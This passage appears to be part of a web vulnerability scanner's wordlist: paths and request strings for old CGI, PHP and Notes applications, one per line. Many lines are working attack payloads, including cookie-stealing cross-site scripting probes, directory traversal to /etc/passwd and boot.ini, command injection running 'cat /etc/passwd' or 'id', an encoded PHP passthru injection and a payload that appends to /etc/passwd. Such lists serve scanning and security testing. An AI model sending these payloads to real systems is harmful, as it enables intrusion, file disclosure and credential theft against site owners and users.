us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
|
||
|
|
usage/
|
||
|
|
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
|
||
|
|
user.php?op=userinfo&uname=<script>alert('hi');</script>
|
||
|
|
user/
|
||
|
|
useraction.php3
|
||
|
|
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
|
||
|
|
userinfo.php?uid=1;
|
||
|
|
userlog.php
|
||
|
|
userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
|
||
|
|
userreg.nsf
|
||
|
|
users.lst
|
||
|
|
users.nsf
|
||
|
|
users.php?mode=profile&uid=<script>alert(document.cookie)</script>
|
||
|
|
users/
|
||
|
|
users/scripts/submit.cgi
|
||
|
|
ustats/
|
||
|
|
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc
|
||
|
|
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
|
||
|
|
usuario/
|
||
|
|
usuarios/
|
||
|
|
utils/sprc.asp
|
||
|
|
utils/sprc.asp+
|
||
|
|
utm/admin
|
||
|
|
utm/utm_stat
|
||
|
|
vars.inc+
|
||
|
|
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
|
||
|
|
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
|
||
|
|
vc30/
|
||
|
|
vchat/msg.txt
|
||
|
|
vfs/
|
||
|
|
vgn/ac/data
|
||
|
|
vgn/ac/delete
|
||
|
|
vgn/ac/edit
|
||
|
|
vgn/ac/esave
|
||
|
|
vgn/ac/fsave
|
||
|
|
vgn/ac/index
|
||
|
|
vgn/asp/MetaDataUpdate
|
||
|
|
vgn/asp/previewer
|
||
|
|
vgn/asp/status
|
||
|
|
vgn/asp/style
|
||
|
|
vgn/errors
|
||
|
|
vgn/jsp/controller
|
||
|
|
vgn/jsp/errorpage
|
||
|
|
vgn/jsp/initialize
|
||
|
|
vgn/jsp/jspstatus
|
||
|
|
vgn/jsp/jspstatus56
|
||
|
|
vgn/jsp/metadataupdate
|
||
|
|
vgn/jsp/previewer
|
||
|
|
vgn/jsp/style
|
||
|
|
vgn/legacy/edit
|
||
|
|
vgn/legacy/save
|
||
|
|
vgn/license
|
||
|
|
vgn/login
|
||
|
|
vgn/login/1,501,,00.html?cookieName=x--\>
|
||
|
|
vgn/performance/TMT
|
||
|
|
vgn/performance/TMT/Report
|
||
|
|
vgn/performance/TMT/Report/XML
|
||
|
|
vgn/performance/TMT/reset
|
||
|
|
vgn/ppstats
|
||
|
|
vgn/previewer
|
||
|
|
vgn/record/previewer
|
||
|
|
vgn/style
|
||
|
|
vgn/stylepreviewer
|
||
|
|
vgn/vr/Deleting
|
||
|
|
vgn/vr/Editing
|
||
|
|
vgn/vr/Saving
|
||
|
|
vgn/vr/Select
|
||
|
|
vider.php3
|
||
|
|
view-source
|
||
|
|
view-source?view-source
|
||
|
|
view_item?HTML_FILE=../../../../../../../../../../etc
|
||
|
|
view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
|
||
|
|
view_source.jsp
|
||
|
|
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
|
||
|
|
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
|
||
|
|
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
|
||
|
|
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
|
||
|
|
viewlogs.pl
|
||
|
|
viewpage.php?file=/etc/passwd
|
||
|
|
viewsource?/etc/passwd
|
||
|
|
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
viralator.cgi
|
||
|
|
virgil.cgi
|
||
|
|
visadmin.exe
|
||
|
|
visitor.exe
|
||
|
|
vote.cgi
|
||
|
|
vpasswd.cgi
|
||
|
|
vpuserinfo.nsf
|
||
|
|
vq/demos/respond.pl?<script>alert('Vulnerable')</script>
|
||
|
|
vq/demos/respond.pl?<script>alert('XSS')</script>
|
||
|
|
w-agora/
|
||
|
|
w3-msql
|
||
|
|
w3-sql
|
||
|
|
w3perl/admin
|
||
|
|
wa.exe
|
||
|
|
wais.pl
|
||
|
|
warez/
|
||
|
|
way-board.cgi?db=/etc/passwd%00
|
||
|
|
way-board/way-board.cgi?db=/etc/passwd%00
|
||
|
|
wbboard/profile.php
|
||
|
|
wbboard/reply.php
|
||
|
|
wconsole.dll
|
||
|
|
web-console/ServerInfo.jsp%00
|
||
|
|
web.config
|
||
|
|
web.nsf
|
||
|
|
web/
|
||
|
|
web800fo/
|
||
|
|
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
|
||
|
|
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
|
||
|
|
web_app/WEB-INF/webapp.properties
|
||
|
|
webaccess.htm
|
||
|
|
webaccess/access-options.txt
|
||
|
|
webadmin.nsf
|
||
|
|
webadmin/
|
||
|
|
webais
|
||
|
|
webalizer/
|
||
|
|
webamil/test.php
|
||
|
|
webamil/test.php?mode=phpinfo
|
||
|
|
webapp/admin/_pages/_bc4jadmin/
|
||
|
|
webbbs.cgi
|
||
|
|
webbbs.exe
|
||
|
|
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
|
||
|
|
webboard/
|
||
|
|
webcache/
|
||
|
|
webcache/webcache.xml
|
||
|
|
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
|
||
|
|
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
|
||
|
|
webcalendar/login.php
|
||
|
|
webcalendar/view_m.php
|
||
|
|
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
|
||
|
|
webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
|
||
|
|
webcart-lite/
|
||
|
|
webcart-lite/config/import.txt
|
||
|
|
webcart-lite/orders/import.txt
|
||
|
|
webcart/
|
||
|
|
webcart/carts/
|
||
|
|
webcart/config/
|
||
|
|
webcart/config/clients.txt
|
||
|
|
webcart/orders/
|
||
|
|
webcart/orders/import.txt
|
||
|
|
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
|
||
|
|
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
|
||
|
|
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
|
||
|
|
webdata/
|
||
|
|
webdav/index.html
|
||
|
|
webdist.cgi?distloc=;cat%20/etc/passwd
|
||
|
|
webdriver
|
||
|
|
webfind.exe?keywords=01234567890123456789
|
||
|
|
webgais
|
||
|
|
webif.cgi
|
||
|
|
weblog/
|
||
|
|
weblogic
|
||
|
|
weblogs/
|
||
|
|
webmail/
|
||
|
|
webmail/blank.html
|
||
|
|
webmail/horde/test.php
|
||
|
|
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
|
||
|
|
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
webmail/lib/emailreader_execute_on_each_page.inc.php
|
||
|
|
webmail/src/read_body.php
|
||
|
|
webmap.cgi
|
||
|
|
webmaster_logs/
|
||
|
|
webnews.pl
|
||
|
|
webplus.exe?about
|
||
|
|
webplus?about
|
||
|
|
webplus?script=../../../../../../../../../../etc
|
||
|
|
webplus?script=../../../../../../../../../../etc/passwd
|
||
|
|
websendmail
|
||
|
|
website/
|
||
|
|
webspirs.cgi?sp.nextform=../../../../../../../../../../etc
|
||
|
|
webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
|
||
|
|
webstats/
|
||
|
|
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
|
||
|
|
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
|
||
|
|
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
|
||
|
|
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
|
||
|
|
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
|
||
|
|
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
|
||
|
|
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
|
||
|
|
webtop/wdk/
|
||
|
|
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
|
||
|
|
webtop/wdk/samples/index.jsp
|
||
|
|
webuser.nsf
|
||
|
|
webutil.pl
|
||
|
|
webutils.pl
|
||
|
|
webwho.pl
|
||
|
|
welcome.nsf
|
||
|
|
wguest.exe
|
||
|
|
whatever.htr
|
||
|
|
whateverJUNK(4).html
|
||
|
|
where.pl?sd=ls%20/etc
|
||
|
|
whois.cgi?action=load&whois=%3Bid
|
||
|
|
whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
|
||
|
|
whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
|
||
|
|
whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
|
||
|
|
wikihome/action/conflict.php
|
||
|
|
windmail
|
||
|
|
windmail.exe
|
||
|
|
windows/
|
||
|
|
wksinst.nsf
|
||
|
|
word/
|
||
|
|
work/
|
||
|
|
wrap
|
||
|
|
wrap.cgi
|
||
|
|
ws_ftp.ini
|
||
|
|
wstats/
|
||
|
|
wusage/
|
||
|
|
www-sql
|
||
|
|
www-sql/
|
||
|
|
www/
|
||
|
|
wwwadmin.pl
|
||
|
|
wwwboard.cgi.cgi
|
||
|
|
wwwboard.pl
|
||
|
|
wwwboard/passwd.txt
|
||
|
|
wwwboard/wwwboard.cgi
|
||
|
|
wwwboard/wwwboard.pl
|
||
|
|
wwwjoin/
|
||
|
|
wwwlog/
|
||
|
|
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
|
||
|
|
wwwstats.html
|
||
|
|
wwwstats.pl
|
||
|
|
wwwstats/
|
||
|
|
wwwthreads/3tvars.pm
|
||
|
|
wwwthreads/w3tvars.pm
|
||
|
|
wwwwais
|
||
|
|
wx/s.dll?d=/boot.ini
|
||
|
|
x_stat_admin.php
|
||
|
|
xdk/
|
||
|
|
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
|
||
|
|
yabbse/Reminder.php
|
||
|
|
yabbse/Sources/Packages.php
|
||
|
|
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
|
||
|
|
zentrack/index.php
|
||
|
|
zipfiles/
|
||
|
|
zml.cgi?file=../../../../../../../../../../etc
|
||
|
|
zml.cgi?file=../../../../../../../../../../etc/passwd%00
|
||
|
|
zorum/index.php?method=<script>alert('Vulnerable')</script>
|
||
|
|
zsh
|
||
|
|
~/<script>alert('Vulnerable')</script>.asp
|
||
|
|
~/<script>alert('Vulnerable')</script>.aspx
|
||
|
|
~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
|
||
|
|
~nobody/etc/passwd
|